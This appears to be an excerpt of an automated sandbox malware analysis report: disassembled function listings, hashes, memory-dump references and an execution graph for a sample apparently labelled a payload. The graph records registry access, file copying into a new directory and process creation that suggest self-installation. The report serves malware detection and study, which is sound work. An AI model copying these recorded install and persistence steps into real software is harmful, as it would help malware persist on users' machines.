                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2824100046-0
                                                                                                        • Opcode ID: 8261b1a11354e8c3a115cd3cf9b4b14b8385a43febbd1ccc566354ea05c30e0b
                                                                                                        • Instruction ID: d33266af43b53f72a9b4ef64e9468f4aabea570927e9103a7d2ee70d80888235
                                                                                                        • Opcode Fuzzy Hash: 8261b1a11354e8c3a115cd3cf9b4b14b8385a43febbd1ccc566354ea05c30e0b
                                                                                                        • Instruction Fuzzy Hash: ABF02735702209BBE72056659C4AFBB779EDB86760F100226B604E32C1E9512D0162F5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F22800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32 ref: 00F22806
                                                                                                        • _malloc.LIBCMT ref: 00F22814
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: RtlAllocateHeap.NTDLL(00840000,00000000,00000001,00000001,?,?,?,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30CA5
                                                                                                        • _memset.LIBCMT ref: 00F2281F
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00F22832
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2824100046-0
                                                                                                        • Opcode ID: 0425119418060a185f1675dee5b3951312f96b91e1490b26333ecec88dd7fc52
                                                                                                        • Instruction ID: febcf9d74a17deaa687e1e70fc128a6275dd813220bf3766dde3c18c2c0a915a
                                                                                                        • Opcode Fuzzy Hash: 0425119418060a185f1675dee5b3951312f96b91e1490b26333ecec88dd7fc52
                                                                                                        • Instruction Fuzzy Hash: 27E086763021297BE51023696C4EFAB761DCBC27B5F100212F611D22D2CA951C01D1F0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F24920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: 4b16c824b2ae4d6f6bbc70f8339eb37aa4dd36f8abefde389663dfefb345b3d1
                                                                                                        • Instruction ID: 0869fcbf4c9f62750f0b932e87fd1b958eed4886530623832c47f87a55cceabb
                                                                                                        • Opcode Fuzzy Hash: 4b16c824b2ae4d6f6bbc70f8339eb37aa4dd36f8abefde389663dfefb345b3d1
                                                                                                        • Instruction Fuzzy Hash: BAC15E71700229DBCB24CF5CE8C09AAB3B6FF88300B20456DE8468B655DBB4FD55EB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F80040 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: .\crypto\asn1\tasn_new.c
                                                                                                        • API String ID: 2102423945-2878120539
                                                                                                        • Opcode ID: 27db5854caf6298ef1e8621bccb3974367a93327b72bc4a4078f87fd2e5ecba6
                                                                                                        • Instruction ID: be4dd7032171d565e25f733f26c0158b0341ef2e6314aa21c99bf50d90ef95ad
                                                                                                        • Opcode Fuzzy Hash: 27db5854caf6298ef1e8621bccb3974367a93327b72bc4a4078f87fd2e5ecba6
                                                                                                        • Instruction Fuzzy Hash: 9151E871B4030627E7707EA69C86FA77798DF41B70F440429F918D5182EFA5E818B3B1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F27D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: ba61cd605d6c55358d37fcaa5124fcece86bbebd2005853af38be06711f06f78
                                                                                                        • Instruction ID: cff4ec7d2eb6cbc8120ade880556ce54ca9e6b10145f2466794e2e9287577f8d
                                                                                                        • Opcode Fuzzy Hash: ba61cd605d6c55358d37fcaa5124fcece86bbebd2005853af38be06711f06f78
                                                                                                        • Instruction Fuzzy Hash: BE51BE317087299BCF24EF18E8809AEB7B6FF84310B60456DE8458B251DB31ED55ABE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F6AD50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: .\crypto\buffer\buffer.c
                                                                                                        • API String ID: 2102423945-294840303
                                                                                                        • Opcode ID: 22be7e925578322317a2e254195904bfb5bbee497444d885576350051d9aa381
                                                                                                        • Instruction ID: c2f202b5848a5abe2f7570d544c50872fe37d55eea23359c692cd5efd953d443
                                                                                                        • Opcode Fuzzy Hash: 22be7e925578322317a2e254195904bfb5bbee497444d885576350051d9aa381
                                                                                                        • Instruction Fuzzy Hash: 7F2107B6F443217BE200666CFC92B25B399EB94B14F004125F718EB2C1D6B4FC1197D5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F23C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F23CA0
                                                                                                          • Part of subcall function 00F33B4C: _malloc.LIBCMT ref: 00F33B64
                                                                                                        • _memset.LIBCMT ref: 00F23C83
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                        • String ID: vector<T> too long
                                                                                                        • API String ID: 1327501947-3788999226
                                                                                                        • Opcode ID: a8f0fd62cf0443543a723b84b52d00490dd2aaf6a0ee7298efc22d4a7be45aeb
                                                                                                        • Instruction ID: 131b50013e31c66600f6491ecfa7c810c8ac822c7be1eef5c44ff4ce90be11a9
                                                                                                        • Opcode Fuzzy Hash: a8f0fd62cf0443543a723b84b52d00490dd2aaf6a0ee7298efc22d4a7be45aeb
                                                                                                        • Instruction Fuzzy Hash: ED01B1F29007105BE330AF19E801757F7E8AF40B70F14842DE99997681E7B9E948D791
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F30DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • Assertion failed: %s, file %s, line %d, xrefs: 00F30E13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __calloc_crt
                                                                                                        • String ID: Assertion failed: %s, file %s, line %d
                                                                                                        • API String ID: 3494438863-969893948
                                                                                                        • Opcode ID: 8fc908a76ccd774e0978c92420c21e76c8de1dc81fb34517ad123e310377705f
                                                                                                        • Instruction ID: 788743a592a0546ae71b4a40a1045eb91d6fa60b5a0de4bf7b1bb56b7f569e9a
                                                                                                        • Opcode Fuzzy Hash: 8fc908a76ccd774e0978c92420c21e76c8de1dc81fb34517ad123e310377705f
                                                                                                        • Instruction Fuzzy Hash: FCF0A471709211DBE734DA6ABC21BA137D8B715770F10441BF280CB188EF7D88816794
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F90620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F90686
                                                                                                          • Part of subcall function 00F64C00: _raise.LIBCMT ref: 00F64C18
                                                                                                        Strings
                                                                                                        • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 00F9062E
                                                                                                        • .\crypto\evp\digest.c, xrefs: 00F90638
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset_raise
                                                                                                        • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                        • API String ID: 1484197835-3867593797
                                                                                                        • Opcode ID: b4853a2ad07067acaf4bca0184de09dcf27ae418265e5a28e2b7c5123b3be235
                                                                                                        • Instruction ID: 6e3f65c682a5d630d58f9931d5508eeecda024f9ad8d83db3ca882233a9ebdce
                                                                                                        • Opcode Fuzzy Hash: b4853a2ad07067acaf4bca0184de09dcf27ae418265e5a28e2b7c5123b3be235
                                                                                                        • Instruction Fuzzy Hash: CB018F75A002009FD711DF08EC42E55B7E1AFC8710F154428F584CB352DB62EC559B95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:7%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:2000
                                                                                                        Total number of Limit Nodes:199
                                                                                                        execution_graph 38709 f1bae0 38710 f1bba0 38709->38710 38711 f1bb13 38709->38711 38712 f1bf3d 38710->38712 38713 f1bbad 38710->38713 38714 f1bb15 38711->38714 38715 f1bb54 38711->38715 38722 f1bf65 IsWindow 38712->38722 38723 f1bf9a DefWindowProcW 38712->38723 38717 f1bbb0 DefWindowProcW 38713->38717 38718 f1bbd7 38713->38718 38719 f1bb47 PostQuitMessage 38714->38719 38720 f1bb1c 38714->38720 38716 f1bb70 38715->38716 38721 f1bb75 DefWindowProcW 38715->38721 38785 f20c62 38718->38785 38719->38716 38720->38716 38720->38717 38727 f1bb2e 38720->38727 38722->38716 38725 f1bf73 DestroyWindow 38722->38725 38725->38716 38727->38716 38748 f11cd0 38727->38748 38729 f1bc26 38809 f1ce80 59 API calls _memmove 38729->38809 38732 f1bb3f 38732->38722 38733 f1bc3a 38810 f20bed 38733->38810 38735 f1befb IsWindow 38736 f1bf11 38735->38736 38737 f1bf28 38735->38737 38736->38737 38738 f1bf1a DestroyWindow 38736->38738 38737->38716 38738->38737 38739 f1bef7 38739->38735 38739->38737 38740 f14690 59 API calls 38746 f1bcdc 38740->38746 38746->38735 38746->38739 38746->38740 38747 f1be8f CreateThread 38746->38747 38816 f0eff0 65 API calls 38746->38816 38817 f1c330 38746->38817 38823 f1c240 38746->38823 38829 f1b8b0 38746->38829 38851 f1ce80 59 API calls _memmove 38746->38851 38747->38746 38852 f2f7c0 38748->38852 38751 f11d20 _memset 38752 f11d40 RegQueryValueExW RegCloseKey 38751->38752 38753 f11d8f 38752->38753 38854 f15c10 38753->38854 38755 f11dbf 38756 f11dd1 lstrlenA 38755->38756 38757 f11e7c 38755->38757 38867 f13520 38756->38867 38759 f11e94 6 API calls 38757->38759 38760 f11e89 38757->38760 38761 f11ef5 UuidCreate UuidToStringW 38759->38761 38760->38759 38763 f11f36 38761->38763 38762 f11e3c PathFileExistsW 38762->38757 38764 f11e52 38762->38764 38763->38763 38765 f15c10 59 API calls 38763->38765 38769 f11e6a 38764->38769 38870 f14690 38764->38870 38767 f11f59 RpcStringFreeW PathAppendW CreateDirectoryW 38765->38767 38766 f11df1 38766->38762 38771 f11f98 38767->38771 38773 f11fce 38767->38773 38769->38732 38770 f15c10 59 API calls 38774 f1201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 38770->38774 38772 f15c10 59 API calls 38771->38772 38772->38773 38773->38770 38775 f121d1 38774->38775 38776 f1207c _memset 38774->38776 38775->38769 38777 f12095 6 API calls 38776->38777 38778 f12115 _memset 38777->38778 38779 f12109 38777->38779 38781 f12125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 38778->38781 38893 f13260 38779->38893 38782 f121b2 38781->38782 38783 f121aa GetLastError 38781->38783 38784 f121c0 WaitForSingleObject 38782->38784 38783->38775 38784->38775 38784->38784 38786 f20cdd 38785->38786 38792 f20c6e 38785->38792 38935 f2793d DecodePointer 38786->38935 38788 f20ce3 38789 f25208 ___crtsetenv 57 API calls 38788->38789 38801 f1bbe9 GetComputerNameW 38789->38801 38791 f20ca1 RtlAllocateHeap 38791->38792 38791->38801 38792->38791 38794 f20cc9 38792->38794 38795 f20c79 38792->38795 38799 f20cc7 38792->38799 38931 f2793d DecodePointer 38792->38931 38932 f25208 38794->38932 38795->38792 38928 f27f51 58 API calls 2 library calls 38795->38928 38929 f27fae 58 API calls 10 library calls 38795->38929 38930 f27b0b GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 38795->38930 38800 f25208 ___crtsetenv 57 API calls 38799->38800 38800->38801 38802 f13100 38801->38802 38803 f13121 38802->38803 38806 f13133 38802->38806 38804 f15c10 59 API calls 38803->38804 38805 f1312c 38804->38805 38805->38729 38807 f15c10 59 API calls 38806->38807 38808 f13159 38807->38808 38808->38729 38809->38733 38811 f20c1f _free 38810->38811 38812 f20bf6 HeapFree 38810->38812 38811->38746 38812->38811 38813 f20c0b 38812->38813 38814 f25208 ___crtsetenv 56 API calls 38813->38814 38815 f20c11 GetLastError 38814->38815 38815->38811 38816->38746 38971 f1d3c0 38817->38971 38820 f1c35b 38820->38746 38982 f1d340 38823->38982 38826 f1c26b 38826->38746 38830 f1b8d6 38829->38830 38833 f1b8e0 38829->38833 38831 f14690 59 API calls 38830->38831 38831->38833 38832 f1b916 38835 f1b930 38832->38835 38836 f14690 59 API calls 38832->38836 38833->38832 38834 f14690 59 API calls 38833->38834 38834->38832 38837 f14690 59 API calls 38835->38837 38839 f1b94a 38835->38839 38836->38835 38837->38839 38838 f1b964 38996 f1bfd0 38838->38996 38839->38838 38841 f14690 59 API calls 38839->38841 38841->38838 38842 f1b976 38843 f1bfd0 59 API calls 38842->38843 38844 f1b988 38843->38844 38845 f1bfd0 59 API calls 38844->38845 38846 f1b99a 38845->38846 38847 f1b9b4 38846->38847 38848 f14690 59 API calls 38846->38848 38849 f1b9f2 38847->38849 39008 f13ff0 38847->39008 38848->38847 38849->38746 38851->38746 38853 f11cf2 RegOpenKeyExW 38852->38853 38853->38751 38853->38769 38855 f15c66 38854->38855 38859 f15c1e 38854->38859 38856 f15c76 38855->38856 38857 f15cff 38855->38857 38864 f15c88 _signal 38856->38864 38900 f16950 38856->38900 38909 f4f23e 59 API calls 2 library calls 38857->38909 38859->38855 38866 f14690 59 API calls 38859->38866 38864->38755 38866->38855 38868 f14690 59 API calls 38867->38868 38869 f13550 38868->38869 38869->38766 38871 f146a9 38870->38871 38872 f1478c 38870->38872 38874 f146b6 38871->38874 38875 f146e9 38871->38875 38925 f4f26c 59 API calls 3 library calls 38872->38925 38878 f14796 38874->38878 38879 f146c2 38874->38879 38876 f147a0 38875->38876 38877 f146f5 38875->38877 38927 f4f23e 59 API calls 2 library calls 38876->38927 38883 f16950 59 API calls 38877->38883 38889 f14707 _signal 38877->38889 38926 f4f26c 59 API calls 3 library calls 38878->38926 38924 f13340 59 API calls _memmove 38879->38924 38883->38889 38888 f146e0 38888->38769 38889->38769 38894 f1326f 38893->38894 38896 f1327d 38893->38896 38895 f15c10 59 API calls 38894->38895 38897 f13278 38895->38897 38896->38896 38898 f15c10 59 API calls 38896->38898 38897->38778 38899 f1329c 38898->38899 38899->38778 38901 f16986 38900->38901 38902 f169d3 38901->38902 38905 f16a0d _signal 38901->38905 38910 f23b4c 38901->38910 38902->38905 38920 f4f1bb 59 API calls 3 library calls 38902->38920 38905->38864 38912 f23b54 38910->38912 38911 f20c62 _malloc 58 API calls 38911->38912 38912->38911 38913 f23b6e 38912->38913 38915 f23b72 std::exception::exception 38912->38915 38921 f2793d DecodePointer 38912->38921 38913->38902 38922 f30eca RaiseException 38915->38922 38917 f23b9c 38923 f30d91 58 API calls _free 38917->38923 38919 f23bae 38919->38902 38921->38912 38922->38917 38923->38919 38924->38888 38925->38878 38926->38876 38928->38795 38929->38795 38931->38792 38936 f2501f GetLastError 38932->38936 38934 f2520d 38934->38799 38935->38788 38950 f32534 38936->38950 38938 f25034 38939 f25082 SetLastError 38938->38939 38953 f28c96 38938->38953 38939->38934 38943 f2505b 38944 f25061 38943->38944 38945 f25079 38943->38945 38960 f2508e 58 API calls 4 library calls 38944->38960 38947 f20bed _free 55 API calls 38945->38947 38949 f2507f 38947->38949 38948 f25069 GetCurrentThreadId 38948->38939 38949->38939 38951 f32547 38950->38951 38952 f3254b TlsGetValue 38950->38952 38951->38938 38952->38938 38954 f28c9d 38953->38954 38956 f25047 38954->38956 38958 f28cbb 38954->38958 38961 f3b813 38954->38961 38956->38939 38959 f32553 TlsSetValue 38956->38959 38958->38954 38958->38956 38969 f329c9 Sleep 38958->38969 38959->38943 38960->38948 38962 f3b839 38961->38962 38963 f3b81e 38961->38963 38965 f3b849 HeapAlloc 38962->38965 38967 f3b82f 38962->38967 38970 f2793d DecodePointer 38962->38970 38963->38962 38964 f3b82a 38963->38964 38966 f25208 ___crtsetenv 57 API calls 38964->38966 38965->38962 38965->38967 38966->38967 38967->38954 38969->38958 38970->38962 38975 f1ccc0 38971->38975 38974 f4f23e 59 API calls 2 library calls 38976 f23b4c 59 API calls 38975->38976 38977 f1ccca 38976->38977 38978 f1c347 38977->38978 38981 f4f1bb 59 API calls 3 library calls 38977->38981 38978->38820 38978->38974 38988 f1cc50 38982->38988 38985 f1c257 38985->38826 38987 f4f23e 59 API calls 2 library calls 38985->38987 38989 f23b4c 59 API calls 38988->38989 38990 f1cc5d 38989->38990 38993 f1cc64 38990->38993 38995 f4f1bb 59 API calls 3 library calls 38990->38995 38993->38985 38994 f1d740 59 API calls 38993->38994 38994->38985 38997 f1c001 38996->38997 39002 f1c00a 38996->39002 38998 f1c083 38997->38998 38999 f1c04c 38997->38999 38997->39002 39001 f1c09e 38998->39001 39005 f1c0e1 38998->39005 39035 f1cf30 